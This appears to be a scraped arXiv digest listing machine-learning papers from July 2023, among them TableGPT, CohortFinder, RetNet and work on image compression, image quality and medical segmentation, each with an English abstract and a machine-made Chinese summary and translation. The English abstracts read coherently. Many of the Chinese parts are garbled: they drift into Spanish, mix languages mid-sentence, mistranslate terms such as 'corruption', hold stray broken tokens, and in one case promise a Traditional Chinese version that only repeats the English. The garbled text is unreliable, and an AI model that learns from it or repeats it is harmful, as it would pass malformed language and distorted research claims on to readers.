Tables are prevalent in real-world databases, requiring significant time and effort for humans to analyze and manipulate. The advancements in large language models (LLMs) have made it possible to interact with tables using natural language input, bringing this capability closer to reality. In this paper, we present TableGPT, a unified fine-tuned framework that enables LLMs to understand and operate on tables using external functional commands. It introduces the capability to seamlessly interact with tables, enabling a wide range of functionalities such as question answering, data manipulation (e.g., insert, delete, query, and modify operations), data visualization, analysis report generation, and automated prediction. TableGPT aims to provide convenience and accessibility to users by empowering them to effortlessly leverage tabular data. At the core of TableGPT lies the novel concept of global tabular representations, which empowers LLMs to gain a comprehensive understanding of the entire table beyond meta-information. By jointly training LLMs on both table and text modalities, TableGPT achieves a deep understanding of tabular data and the ability to perform complex operations on tables through chain-of-command instructions. Importantly, TableGPT offers the advantage of being a self-contained system rather than relying on external API interfaces. Moreover, it supports efficient data process flow, query rejection (when appropriate) and private deployment, enabling faster domain data fine-tuning and ensuring data privacy, which enhances the framework's adaptability to specific use cases.

摘要
Tables are prevalent in real-world databases, requiring significant time and effort for humans to analyze and manipulate. The advancements in large language models (LLMs) have made it possible to interact with tables using natural language input, bringing this capability closer to reality. In this paper, we present TableGPT, a unified fine-tuned framework that enables LLMs to understand and operate on tables using external functional commands. It introduces the capability to seamlessly interact with tables, enabling a wide range of functionalities such as question answering, data manipulation (e.g., insert, delete, query, and modify operations), data visualization, analysis report generation, and automated prediction. TableGPT aims to provide convenience and accessibility to users by empowering them to effortlessly leverage tabular data. At the core of TableGPT lies the novel concept of global tabular representations, which empowers LLMs to gain a comprehensive understanding of the entire table beyond meta-information. By jointly training LLMs on both table and text modalities, TableGPT achieves a deep understanding of tabular data and the ability to perform complex operations on tables through chain-of-command instructions. Importantly, TableGPT offers the advantage of being a self-contained system rather than relying on external API interfaces. Moreover, it supports efficient data process flow, query rejection (when appropriate) and private deployment, enabling faster domain data fine-tuning and ensuring data privacy, which enhances the framework's adaptability to specific use cases.

CohortFinder: an open-source tool for data-driven partitioning of biomedical image cohorts to yield robust machine learning models

paper_url: http://arxiv.org/abs/2307.08673
repo_url: None
paper_authors: Fan Fan, Georgia Martinez, Thomas Desilvio, John Shin, Yijiang Chen, Bangchen Wang, Takaya Ozeki, Maxime W. Lafarge, Viktor H. Koelzer, Laura Barisoni, Anant Madabhushi, Satish E. Viswanath, Andrew Janowczyk
for: 降低机器学习模型的泛化性下降，减少批处理影响
methods: 使用数据驱动的 cohort 分割方法来缓解批处理的影响
results: 在医疗影像处理任务中，使用 CohortFinder 可以提高机器学习模型的性能

Abstract
Batch effects (BEs) refer to systematic technical differences in data collection unrelated to biological variations whose noise is shown to negatively impact machine learning (ML) model generalizability. Here we release CohortFinder, an open-source tool aimed at mitigating BEs via data-driven cohort partitioning. We demonstrate CohortFinder improves ML model performance in downstream medical image processing tasks. CohortFinder is freely available for download at cohortfinder.com.

摘要
批处效应（BE）指的是数据收集过程中的系统性技术差异，不 relacionados con variationes biológicas，这些噪声可能会负面影响机器学习（ML）模型的泛化性。我们现在发布了一个开源工具，即CohortFinder，用于缓解BE的影响。我们在医学图像处理任务中展示了CohortFinder可以提高ML模型的性能。CohortFinder可以免费下载于cohortfinder.com。

Neural Image Compression: Generalization, Robustness, and Spectral Biases

paper_url: http://arxiv.org/abs/2307.08657
repo_url: None
paper_authors: Kelsey Lieberman, James Diffenderfer, Charles Godfrey, Bhavya Kailkhura
for: 评估 neural image compression (NIC) 模型在实际应用中的抗迁移性和一致性性能。
methods: 提供了一个完整的benchmark suite来评估图像压缩方法的out-of-distribution (OOD)性能，包括CLIC-C和Kodak-C两个 benchmark，并提出了基于 спектrum的检查工具来深入了解图像压缩方法引入的错误和OOD性能。
results: 对一种经典编码器和多种 NIC 变体进行了详细的性能比较，发现了一些挑战当前我们对 NIC 的强点和局限性的发现，并通过理论分析深入了解 NIC 的OOD性能和数据的spectral properties的关系。

Abstract
Recent neural image compression (NIC) advances have produced models which are starting to outperform traditional codecs. While this has led to growing excitement about using NIC in real-world applications, the successful adoption of any machine learning system in the wild requires it to generalize (and be robust) to unseen distribution shifts at deployment. Unfortunately, current research lacks comprehensive datasets and informative tools to evaluate and understand NIC performance in real-world settings. To bridge this crucial gap, first, this paper presents a comprehensive benchmark suite to evaluate the out-of-distribution (OOD) performance of image compression methods. Specifically, we provide CLIC-C and Kodak-C by introducing 15 corruptions to popular CLIC and Kodak benchmarks. Next, we propose spectrally inspired inspection tools to gain deeper insight into errors introduced by image compression methods as well as their OOD performance. We then carry out a detailed performance comparison of a classical codec with several NIC variants, revealing intriguing findings that challenge our current understanding of the strengths and limitations of NIC. Finally, we corroborate our empirical findings with theoretical analysis, providing an in-depth view of the OOD performance of NIC and its dependence on the spectral properties of the data. Our benchmarks, spectral inspection tools, and findings provide a crucial bridge to the real-world adoption of NIC. We hope that our work will propel future efforts in designing robust and generalizable NIC methods. Code and data will be made available at https://github.com/klieberman/ood_nic.

摘要
Recent neural image compression (NIC) advances have produced models that are starting to outperform traditional codecs. While this has led to growing excitement about using NIC in real-world applications, the successful adoption of any machine learning system in the wild requires it to generalize (and be robust) to unseen distribution shifts at deployment. Unfortunately, current research lacks comprehensive datasets and informative tools to evaluate and understand NIC performance in real-world settings. To bridge this crucial gap, first, this paper presents a comprehensive benchmark suite to evaluate the out-of-distribution (OOD) performance of image compression methods. Specifically, we provide CLIC-C and Kodak-C by introducing 15 corruptions to popular CLIC and Kodak benchmarks. Next, we propose spectrally inspired inspection tools to gain deeper insight into errors introduced by image compression methods as well as their OOD performance. We then carry out a detailed performance comparison of a classical codec with several NIC variants, revealing intriguing findings that challenge our current understanding of the strengths and limitations of NIC. Finally, we corroborate our empirical findings with theoretical analysis, providing an in-depth view of the OOD performance of NIC and its dependence on the spectral properties of the data. Our benchmarks, spectral inspection tools, and findings provide a crucial bridge to the real-world adoption of NIC. We hope that our work will propel future efforts in designing robust and generalizable NIC methods. Code and data will be made available at https://github.com/klieberman/ood_nic.Here's the translation in Traditional Chinese:Recent neural image compression (NIC) advances have produced models that are starting to outperform traditional codecs. While this has led to growing excitement about using NIC in real-world applications, the successful adoption of any machine learning system in the wild requires it to generalize (and be robust) to unseen distribution shifts at deployment. Unfortunately, current research lacks comprehensive datasets and informative tools to evaluate and understand NIC performance in real-world settings. To bridge this crucial gap, first, this paper presents a comprehensive benchmark suite to evaluate the out-of-distribution (OOD) performance of image compression methods. Specifically, we provide CLIC-C and Kodak-C by introducing 15 corruptions to popular CLIC and Kodak benchmarks. Next, we propose spectrally inspired inspection tools to gain deeper insight into errors introduced by image compression methods as well as their OOD performance. We then carry out a detailed performance comparison of a classical codec with several NIC variants, revealing intriguing findings that challenge our current understanding of the strengths and limitations of NIC. Finally, we corroborate our empirical findings with theoretical analysis, providing an in-depth view of the OOD performance of NIC and its dependence on the spectral properties of the data. Our benchmarks, spectral inspection tools, and findings provide a crucial bridge to the real-world adoption of NIC. We hope that our work will propel future efforts in designing robust and generalizable NIC methods. Code and data will be made available at https://github.com/klieberman/ood_nic.

A General Framework for Learning under Corruption: Label Noise, Attribute Noise, and Beyond

paper_url: http://arxiv.org/abs/2307.08643
repo_url: None
paper_authors: Laura Iacovissi, Nan Lu, Robert C. Williamson
for: 本研究旨在系统地分析损害模型在分布水平上的影响，提供一个涵盖所有损害模型的通用框架，并研究损害对标准预测学习的影响。
methods: 本研究使用Markov kernel来形式地分析损害模型，并发现了 Label和特征上的复杂相互作用和依赖关系，这些关系通常被之前的研究所忽略。
results: 研究发现，损害对标准预测学习会导致 bayes 风险的变化，并提供了对不同损害实例的loss correction的理论分析。

Abstract
Corruption is frequently observed in collected data and has been extensively studied in machine learning under different corruption models. Despite this, there remains a limited understanding of how these models relate such that a unified view of corruptions and their consequences on learning is still lacking. In this work, we formally analyze corruption models at the distribution level through a general, exhaustive framework based on Markov kernels. We highlight the existence of intricate joint and dependent corruptions on both labels and attributes, which are rarely touched by existing research. Further, we show how these corruptions affect standard supervised learning by analyzing the resulting changes in Bayes Risk. Our findings offer qualitative insights into the consequences of "more complex" corruptions on the learning problem, and provide a foundation for future quantitative comparisons. Applications of the framework include corruption-corrected learning, a subcase of which we study in this paper by theoretically analyzing loss correction with respect to different corruption instances.

摘要
<>将文本翻译成简化中文。<>腐败是收集数据中常见的现象，在机器学习中也广泛研究了不同的腐败模型。尽管如此，我们对这些模型之间的关系仍然具有有限的理解，而且还缺乏一个总体的视角来描述这些腐败和它们对学习的影响。在这项工作中，我们使用Markov核来正式分析腐败模型的分布水平。我们发现了 labels和特征上的复杂联合腐败，这些腐败通常不受现有研究的关注。此外，我们还分析了这些腐败对标准指导学习的影响，并研究了由不同的腐败实例导致的损失修复。我们的发现可以提供对"更复杂"腐败对学习问题的影响的质量性理解，并为未来的量化比较提供基础。应用该框架包括腐败修正学习，我们在这篇论文中对这个子情况进行了理论分析。

LearnedSort as a learning-augmented SampleSort: Analysis and Parallelization

paper_url: http://arxiv.org/abs/2307.08637
repo_url: None
paper_authors: Ivan Carvalho, Ramon Lawrence
for: 本文 analyze 和 parallelize LearnedSort algorithm，一种使用机器学习模型来实现排序的新算法。
methods: 本文使用了对predictions的分析， argue dass LearnedSort 是一种learning-augmented SampleSort。
results: 对 synthetic 和实际 dataset 进行了 benchmark， parallel LearnedSort 比 IPS4o 和其他排序算法具有更高的并发性能。

Abstract
This work analyzes and parallelizes LearnedSort, the novel algorithm that sorts using machine learning models based on the cumulative distribution function. LearnedSort is analyzed under the lens of algorithms with predictions, and it is argued that LearnedSort is a learning-augmented SampleSort. A parallel LearnedSort algorithm is developed combining LearnedSort with the state-of-the-art SampleSort implementation, IPS4o. Benchmarks on synthetic and real-world datasets demonstrate improved parallel performance for parallel LearnedSort compared to IPS4o and other sorting algorithms.

摘要
这个工作分析并平行化了 LearnedSort 算法，这是基于累累函数的机器学习模型来进行排序的新算法。 LearnedSort 被视为一种基于预测的算法，并且被证明是一种增强SampleSort的学习算法。我们开发了一种将 LearnedSort 与现有的 SampleSort 实现 IPS4o 结合的平行 LearnedSort 算法。对假数据和实际数据集进行了比较，结果显示了平行 LearnedSort 的性能提高 compared to IPS4o 和其他排序算法。

Retentive Network: A Successor to Transformer for Large Language Models

paper_url: http://arxiv.org/abs/2307.08621
repo_url: https://github.com/microsoft/unilm
paper_authors: Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei
for: This paper proposes a new architecture called Retentive Network (RetNet) for large language models, which simultaneously achieves training parallelism, low-cost inference, and good performance.
methods: The paper uses a retention mechanism for sequence modeling, which supports three computation paradigms: parallel, recurrent, and chunkwise recurrent. The parallel representation allows for training parallelism, while the recurrent representation enables low-cost $O(1)$ inference. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity.
results: The paper shows that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. Experimental results on language modeling demonstrate the effectiveness of RetNet, making it a strong successor to Transformer for large language models.

Abstract
In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks. Experimental results on language modeling show that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. The intriguing properties make RetNet a strong successor to Transformer for large language models. Code will be available at https://aka.ms/retnet.

摘要
在这个工作中，我们提议Retentive Network（RetNet）作为大语言模型的基础架构，同时实现培训并行、低成本推理和好性能。我们理论上 derivates了回忆和注意力之间的连接。然后我们提议了保留机制，用于序列模型化，该机制支持三种计算方式，即并行、循环和块级循环。Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks.实验结果表明，RetNet实现了有利扩展性、并行培训、低成本部署和高效推理。RetNet的特有性使其成为Transformer的强 successor for large language models。代码将提供在https://aka.ms/retnet.

Understanding the impacts of crop diversification in the context of climate change: a machine learning approach

paper_url: http://arxiv.org/abs/2307.08617
repo_url: None
paper_authors: Georgios Giannarakis, Ilias Tsoumas, Stelios Neophytides, Christiana Papoutsa, Charalampos Kontoes, Diofantos Hadjimitsis
for: 这个论文是为了研究农业可持续强化的方法，以及这些方法在气候变化的情况下的影响。
methods: 这篇论文使用了多种数据和机器学习方法来研究农业生产力的影响。
results: 论文发现，在更暖和干燥的气候下，多种作物杂 cultivation 能够提高农业生产力，平均提高了2.8%。这种效果与高温和低湿度有相互作用。

Abstract
The concept of sustainable intensification in agriculture necessitates the implementation of management practices that prioritize sustainability without compromising productivity. However, the effects of such practices are known to depend on environmental conditions, and are therefore expected to change as a result of a changing climate. We study the impact of crop diversification on productivity in the context of climate change. We leverage heterogeneous Earth Observation data and contribute a data-driven approach based on causal machine learning for understanding how crop diversification impacts may change in the future. We apply this method to the country of Cyprus throughout a 4-year period. We find that, on average, crop diversification significantly benefited the net primary productivity of crops, increasing it by 2.8%. The effect generally synergized well with higher maximum temperatures and lower soil moistures. In a warmer and more drought-prone climate, we conclude that crop diversification exhibits promising adaptation potential and is thus a sensible policy choice with regards to agricultural productivity for present and future.

摘要
“减少农业的环境影响是一种把持可持续发展的概念，但这些实践的效果受环境因素的影响，因此随着气候变化而改变。我们研究了采用多种作物杂 planting 对产量的影响，并通过基于 causal machine learning 的数据驱动方法来理解这些影响可能在未来如何变化。我们在塞浦路斯国家范围内进行了4年的研究，发现，在平均来说，多种作物杂 planting 对农作物的 net primary productivity 产生了2.8%的增长。这种效果通常与高温和低湿度相关。在将来的气候变化中，我们认为多种作物杂 planting 具有良好的适应能力，因此是一种有理解的农业产量政策选择。”Note: Please note that the translation is in Simplified Chinese, which is one of the two standard versions of Chinese used in mainland China and Singapore. If you need the translation in Traditional Chinese, please let me know.

Temporal and Geographical Analysis of Real Economic Activities in the Bitcoin Blockchain

paper_url: http://arxiv.org/abs/2307.08616
repo_url: None
paper_authors: Rafael Ramos Tubino, Remy Cazabet, Natkamon Tovanich, Celine Robardet
for: The paper focuses on the real economic activity in the Bitcoin blockchain, specifically on transactions between retail users and their neighbors, rather than between organizations.
methods: The paper introduces a heuristic method to classify Bitcoin players into three main categories: Frequent Receivers (FR), Neighbors of FR, and Others.
results: Most real transactions involve Frequent Receivers, who represent a small fraction of the total value exchanged but a significant fraction of all payments, which raises concerns about the centralization of the Bitcoin ecosystem. Additionally, the paper conducts a weekly pattern analysis of activity to provide insights into the geographical location of Bitcoin users and to quantify the bias of a well-known dataset for actor identification.Here are the same information points in Simplified Chinese text:
for: 这篇论文关注比特币链上真实的经济活动，具体来说是对于个人用户的交易，而不是 между机构如市场、交易所或其他服务。
methods: 论文提出一种归纳方法，将比特币玩家分为三类：固定接收者（FR）、邻居 FR 和其他人。
results: 实际交易主要发生在固定接收者身上，占总交易值的小部分，但占所有支付的重要部分，这引发了中央化的担忧。论文还进行了每周活动模式分析，提供了比特币用户的地理位置信息，并且量化了一个常见的数据集的偏见。

Abstract
We study the real economic activity in the Bitcoin blockchain that involves transactions from/to retail users rather than between organizations such as marketplaces, exchanges, or other services. We first introduce a heuristic method to classify Bitcoin players into three main categories: Frequent Receivers (FR), Neighbors of FR, and Others. We show that most real transactions involve Frequent Receivers, representing a small fraction of the total value exchanged according to the blockchain, but a significant fraction of all payments, raising concerns about the centralization of the Bitcoin ecosystem. We also conduct a weekly pattern analysis of activity, providing insights into the geographical location of Bitcoin users and allowing us to quantify the bias of a well-known dataset for actor identification.

摘要
我们研究比特币区块链上真正的经济活动，涉及到零售用户的交易而不是组织如市场、交易所或其他服务。我们首先提出一种启发法来分类比特币玩家为三个主要类别：固定接收者（FR）、邻居FR和其他人。我们表明，大多数真实交易发生在固定接收者身上，表示比特币总额中的一小部分，但是对所有支付都占有重要的比重，引发了中央化比特币生态系统的问题。我们还进行了每周活动模式分析，提供了比特币用户的地理位置信息，并使我们可以评估一个常见的数据集中截然的偏见。

Hyperparameter Tuning Cookbook: A guide for scikit-learn, PyTorch, river, and spotPython

paper_url: http://arxiv.org/abs/2307.10262
repo_url: https://github.com/sequential-parameter-optimization/spotpython
paper_authors: Thomas Bartz-Beielstein
for: 本文提供了一个完整的 гипер参数优化指南，使用 spotPython 对 scikit-learn、PyTorch 和 river 进行优化。
methods: 本文使用 spotPython 的模拟模型基于优化过程，并详细介绍了 hyperparameter tuning 的过程。
results: 本文通过多个案例研究，包括 sklearn 模型 Support Vector Classification、Random Forests、Gradient Boosting (XGB) 和 K-nearest neighbors (KNN) 的 hyperparameter tuning，以及 river 中的 Hoeffding Adaptive Tree Regressor。 plus, the integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed.

Abstract
This document provides a comprehensive guide to hyperparameter tuning using spotPython for scikit-learn, PyTorch, and river. The first part introduces spotPython's surrogate model-based optimization process, while the second part focuses on hyperparameter tuning. Several case studies are presented, including hyperparameter tuning for sklearn models such as Support Vector Classification, Random Forests, Gradient Boosting (XGB), and K-nearest neighbors (KNN), as well as a Hoeffding Adaptive Tree Regressor from river. The integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed. With a hands-on approach and step-by-step explanations, this cookbook serves as a practical starting point for anyone interested in hyperparameter tuning with Python. Highlights include the interplay between Tensorboard, PyTorch Lightning, spotPython, and river. This publication is under development, with updates available on the corresponding webpage.

摘要
这份文档提供了使用spotPython进行scikit-learn、PyTorch和river中的参数优化的全面指南。文档的首部介绍了spotPython的代理模型基于优化过程，而第二部分则专注于参数优化。文档包含了多个案例研究，包括scikit-learn模型如支持向量分类、随机森林、梯度折衔（XGB）和K最近邻（KNN）等，以及来自river的韦伯丁适应树回归模型。文档还讨论了spotPython在PyTorch和PyTorch Lightning训练工作流程中的集成。通过实践的方式和步骤说明，这本cookbook作为Python中参数优化的实践开始点，强调了Tensorboard、PyTorch Lightning、spotPython和river之间的互动。这份文档正在开发中，更新信息可以通过相应的网页获得。

Artificial Intelligence for the Electron Ion Collider (AI4EIC)

paper_url: http://arxiv.org/abs/2307.08593
repo_url: None
paper_authors: C. Allaire, R. Ammendola, E. -C. Aschenauer, M. Balandat, M. Battaglieri, J. Bernauer, M. Bondì, N. Branson, T. Britton, A. Butter, I. Chahrour, P. Chatagnon, E. Cisbani, E. W. Cline, S. Dash, C. Dean, W. Deconinck, A. Deshpande, M. Diefenthaler, R. Ent, C. Fanelli, M. Finger, M. Finger, Jr., E. Fol, S. Furletov, Y. Gao, J. Giroux, N. C. Gunawardhana Waduge, R. Harish, O. Hassan, P. L. Hegde, R. J. Hernández-Pinto, A. Hiller Blin, T. Horn, J. Huang, D. Jayakodige, B. Joo, M. Junaid, P. Karande, B. Kriesten, R. Kunnawalkam Elayavalli, M. Lin, F. Liu, S. Liuti, G. Matousek, M. McEneaney, D. McSpadden, T. Menzo, T. Miceli, V. Mikuni, R. Montgomery, B. Nachman, R. R. Nair, J. Niestroy, S. A. Ochoa Oregon, J. Oleniacz, J. D. Osborn, C. Paudel, C. Pecar, C. Peng, G. N. Perdue, W. Phelps, M. L. Purschke, K. Rajput, Y. Ren, D. F. Renteria-Estrada, D. Richford, B. J. Roy, D. Roy, N. Sato, T. Satogata, G. Sborlini, M. Schram, D. Shih, J. Singh, R. Singh, A. Siodmok, P. Stone, J. Stevens, L. Suarez, K. Suresh, A. -N. Tawfik, F. Torales Acosta, N. Tran, R. Trotta, F. J. Twagirayezu, R. Tyson, S. Volkova, A. Vossen, E. Walter, D. Whiteson, M. Williams, S. Wu, N. Zachariou, P. Zurita
for: The paper is written for the EIC community, discussing the potential applications of AI/ML in the facility’s experiments and commissioning processes.
methods: The paper covers various R&D projects and approaches currently being explored in the EIC community, including cutting-edge techniques from other experiments.
results: The paper provides an overview of the goals and strategies regarding AI/ML in the EIC community, as well as the potential benefits and insights that can be gained from their application.Here’s the same information in Simplified Chinese text:
for: 这篇论文是为EIC社区写的，探讨了AI/ML在该设施的实验和启动过程中的潜在应用。
methods: 论文涵盖了EIC社区当前在进行的多个R&D项目和方法，包括其他实验中的前沿技术。
results: 论文提供了EIC社区对AI/ML的应用 goals和策略的概述，以及通过其应用可以获得的优点和发现。

Abstract
The Electron-Ion Collider (EIC), a state-of-the-art facility for studying the strong force, is expected to begin commissioning its first experiments in 2028. This is an opportune time for artificial intelligence (AI) to be included from the start at this facility and in all phases that lead up to the experiments. The second annual workshop organized by the AI4EIC working group, which recently took place, centered on exploring all current and prospective application areas of AI for the EIC. This workshop is not only beneficial for the EIC, but also provides valuable insights for the newly established ePIC collaboration at EIC. This paper summarizes the different activities and R&D projects covered across the sessions of the workshop and provides an overview of the goals, approaches and strategies regarding AI/ML in the EIC community, as well as cutting-edge techniques currently studied in other experiments.

摘要
电子离子碰撞器（EIC），一个最先进的强相互作用研究设施，预计在2028年开始首次实验启用。这是一个非常有利的时机，让人工智能（AI）从设施的开始就包括在内，并在所有实验阶段进行应用。第二年度的AI4EIC工作坊，由AI4EIC工作组组织，最近召开，主要是探讨CURRENT AND PROSPECTIVE APPLICATION AREAS OF AI FOR EIC。这个工作坊不仅对EIC有利，还为新成立的ePIC合作项目提供了宝贵的经验。本文将summarize工作坊的不同活动和R&D项目，提供EIC社区关于AI/ML的目标、方法和战略，以及目前在其他实验中研究的前沿技术。

Snapshot Spectral Clustering – a costless approach to deep clustering ensembles generation

paper_url: http://arxiv.org/abs/2307.08591
repo_url: None
paper_authors: Adam Piróg, Halina Kwaśnicka
for: 本研究旨在探讨将深度学习与聚类结合使用，以提高聚类结果的准确性和稳定性。
methods: 本研究提出了一种新的深度聚类协同方法（Snapshot Spectral Clustering），利用多个视角的数据生成多个深度学习模型，并将其组合以实现更高的聚类精度和稳定性。
results: 实验结果表明，Snapshot Spectral Clustering方法可以减少计算成本，同时提高聚类结果的准确性和稳定性，相比于传统的聚类方法和深度学习方法。

Abstract
Despite tremendous advancements in Artificial Intelligence, learning from large sets of data in an unsupervised manner remains a significant challenge. Classical clustering algorithms often fail to discover complex dependencies in large datasets, especially considering sparse, high-dimensional spaces. However, deep learning techniques proved to be successful when dealing with large quantities of data, efficiently reducing their dimensionality without losing track of underlying information. Several interesting advancements have already been made to combine deep learning and clustering. Still, the idea of enhancing the clustering results by combining multiple views of the data generated by deep neural networks appears to be insufficiently explored yet. This paper aims to investigate this direction and bridge the gap between deep neural networks, clustering techniques and ensemble learning methods. To achieve this goal, we propose a novel deep clustering ensemble method - Snapshot Spectral Clustering, designed to maximize the gain from combining multiple data views while minimizing the computational costs of creating the ensemble. Comparative analysis and experiments described in this paper prove the proposed concept, while the conducted hyperparameter study provides a valuable intuition to follow when selecting proper values.

摘要
To achieve this goal, we propose a novel deep clustering ensemble method called Snapshot Spectral Clustering. This method is designed to maximize the gain from combining multiple data views while minimizing computational costs. Our comparative analysis and experiments show that the proposed method is effective, and a hyperparameter study provides valuable intuition for selecting appropriate values.

2023-07-18

eess.IV

eess.IV - 2023-07-18

paper_url: http://arxiv.org/abs/2307.09279
repo_url: https://github.com/XiaoqiWang/regression-free-iqa
paper_authors: Xiaoqi Wang, Jian Xiong, Hao Gao, Weisi Lin
for: 提高图像质量评估模型的准确性，避免因训练样本偏袋而导致的模型参数估计偏离 reality。
methods: 基于检索相似图像的快速准确评估方法，包括semantic-based classification（SC）模块和distortion-based classification（DC）模块。
results: 对四个标准数据库进行实验，研究发现该方法可以remarkably outperform当前最佳的 regression-based 模型。

Abstract
Regression-based blind image quality assessment (IQA) models are susceptible to biased training samples, leading to a biased estimation of model parameters. To mitigate this issue, we propose a regression-free framework for image quality evaluation, which is founded upon retrieving similar instances by incorporating semantic and distortion features. The motivation behind this approach is rooted in the observation that the human visual system (HVS) has analogous visual responses to semantically similar image contents degraded by the same distortion. The proposed framework comprises two classification-based modules: semantic-based classification (SC) module and distortion-based classification (DC) module. Given a test image and an IQA database, the SC module retrieves multiple pristine images based on semantic similarity. The DC module then retrieves instances based on distortion similarity from the distorted images that correspond to each retrieved pristine image. Finally, the predicted quality score is derived by aggregating the subjective quality scores of multiple retrieved instances. Experimental results on four benchmark databases validate that the proposed model can remarkably outperform the state-of-the-art regression-based models.

摘要
“受训数据受损”问题导致抽象� returns blind图像质量评估（IQA）模型受损。为了解决这个问题，我们提出了一种不含回归的图像质量评估框架，基于检索相似实例。我们发现，人视系统（HVS）在Semantic� 相似的图像内容下具有相似的视觉响应，这成为我们的 Motivation。该框架包括两个分类模块：Semantic-based Classification（SC）模块和Distortion-based Classification（DC）模块。给定一个测试图像和IQA数据库，SC模块首先检索相似的整图，然后DC模块从相应的扭曲图像中检索具有相同扭曲的实例。最后，预测的质量分数由多个检索到的实例的主观质量分数进行汇总得来。实验结果表明，我们提出的模型可以很好地超越当前的回归型模型。

Soft-IntroVAE for Continuous Latent space Image Super-Resolution

paper_url: http://arxiv.org/abs/2307.09008
repo_url: None
paper_authors: Zhi-Song Liu, Zijia Wang, Zhen Jia
for: 这个研究是为了提出一个基于Variational AutoEncoder的连续图像超解析方法，以提供实用和灵活的图像扩展 для不同的显示器。
methods: 本研究使用了Local implicit image representation来将坐标和2D特征映射到隐藏空间中，并通过一种新的潜在空间对抗训练来实现照相实际的图像重建。
results: 研究人员透过量化和质感比较，证明了提案的Soft-introVAE-SR方法的效果，并且显示了其在对照噪声和实际图像超解析中的一般化能力。

Abstract
Continuous image super-resolution (SR) recently receives a lot of attention from researchers, for its practical and flexible image scaling for various displays. Local implicit image representation is one of the methods that can map the coordinates and 2D features for latent space interpolation. Inspired by Variational AutoEncoder, we propose a Soft-introVAE for continuous latent space image super-resolution (SVAE-SR). A novel latent space adversarial training is achieved for photo-realistic image restoration. To further improve the quality, a positional encoding scheme is used to extend the original pixel coordinates by aggregating frequency information over the pixel areas. We show the effectiveness of the proposed SVAE-SR through quantitative and qualitative comparisons, and further, illustrate its generalization in denoising and real-image super-resolution.

摘要
<>将文本翻译成简化中文。>latest continuous image super-resolution (SR) technology has gained significant attention from researchers due to its practical and flexible image scaling capabilities for various displays. local implicit image representation is a method that can map coordinates and 2D features to latent space for interpolation. inspired by Variational AutoEncoder, we propose a Soft-introVAE for continuous latent space image super-resolution (SVAE-SR). a novel latent space adversarial training is achieved for photo-realistic image restoration. to further improve quality, a positional encoding scheme is used to extend the original pixel coordinates by aggregating frequency information over pixel areas. we demonstrate the effectiveness of the proposed SVAE-SR through quantitative and qualitative comparisons, and further illustrate its generalization in denoising and real-image super-resolution.Here's the translation in Traditional Chinese:<>将文本翻译成简化中文。>最新的连续图像超解析（SR）技术在研究人员中获得了很大的关注，因为它具有实用和 flexible 的图像扩展功能 для多种显示器。本地隐式图像表示是一种可以将坐标和2D特征映射到 latent space 中的方法，以便进行插值。受 Variational AutoEncoder 的启发，我们提议了 Soft-introVAE для连续 latent space 图像超解析（SVAE-SR）。我们还实现了一种新的 latent space 反击训练，以达到真实图像 Restoration。为了进一步提高质量，我们使用了一个位置编码方案，将原始像素坐标与像素区域的频率信息聚合。我们显示了 SVAE-SR 的效果，通过量itative和质感比较，并进一步显示其扩展到干扰和真实图像超解析。

Frequency-mixed Single-source Domain Generalization for Medical Image Segmentation

paper_url: http://arxiv.org/abs/2307.09005
repo_url: https://github.com/liamheng/non-iid_medical_image_segmentation
paper_authors: Heng Li, Haojin Li, Wei Zhao, Huazhu Fu, Xiuyun Su, Yan Hu, Jiang Liu
for: 提高医疗影像分类模型的普遍性，特别是当标注数据短缺时。
methods: 提出了一个叫做“频率混合单源领域普遍化法”（FreeSDG），利用不同频率的混合 Spectrum 来增强单源领域，同时运用自我监督来学习具有上下文感知的表示。
results: 实验结果显示，FreeSDG 比前一代方法更有效率，可以优化医疗影像分类模型的普遍性，特别是当标注数据短缺时。

Abstract
The annotation scarcity of medical image segmentation poses challenges in collecting sufficient training data for deep learning models. Specifically, models trained on limited data may not generalize well to other unseen data domains, resulting in a domain shift issue. Consequently, domain generalization (DG) is developed to boost the performance of segmentation models on unseen domains. However, the DG setup requires multiple source domains, which impedes the efficient deployment of segmentation algorithms in clinical scenarios. To address this challenge and improve the segmentation model's generalizability, we propose a novel approach called the Frequency-mixed Single-source Domain Generalization method (FreeSDG). By analyzing the frequency's effect on domain discrepancy, FreeSDG leverages a mixed frequency spectrum to augment the single-source domain. Additionally, self-supervision is constructed in the domain augmentation to learn robust context-aware representations for the segmentation task. Experimental results on five datasets of three modalities demonstrate the effectiveness of the proposed algorithm. FreeSDG outperforms state-of-the-art methods and significantly improves the segmentation model's generalizability. Therefore, FreeSDG provides a promising solution for enhancing the generalization of medical image segmentation models, especially when annotated data is scarce. The code is available at https://github.com/liamheng/Non-IID_Medical_Image_Segmentation.

摘要
